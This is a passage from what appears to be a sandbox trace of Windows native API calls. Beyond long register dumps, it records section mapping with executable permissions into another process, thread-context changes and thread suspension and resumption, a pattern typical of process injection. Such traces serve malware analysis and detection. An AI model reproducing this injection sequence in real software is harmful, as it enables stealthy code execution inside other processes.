[11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x3afba8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x3afb50, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x3afb34, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.120] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.120] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x105200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x106000) returned 0x0 [0195.127] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x105200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x5d0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x106000) returned 0x0 [0195.149] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.155] NtClose (Handle=0x10c) returned 0x0 [0195.156] NtSetContextThread (ThreadHandle=0xbc, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x3afba8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x3afb50, Eip=0x642707, SegCs=0x23, EFlags=0x246, Esp=0x3afb34, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.156] NtResumeThread (in: ThreadHandle=0xbc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.156] NtClose (Handle=0x104) returned 0x0 [0195.156] NtClose (Handle=0xbc) returned 0x0 [0195.157] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x874, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xbc) returned 0x0 [0195.157] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.157] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.157] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.158] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.174] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x580) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0195.174] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.174] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0xbc, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x21a0000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.180] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x17fc48, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x17fbf0, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x17fbd4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, 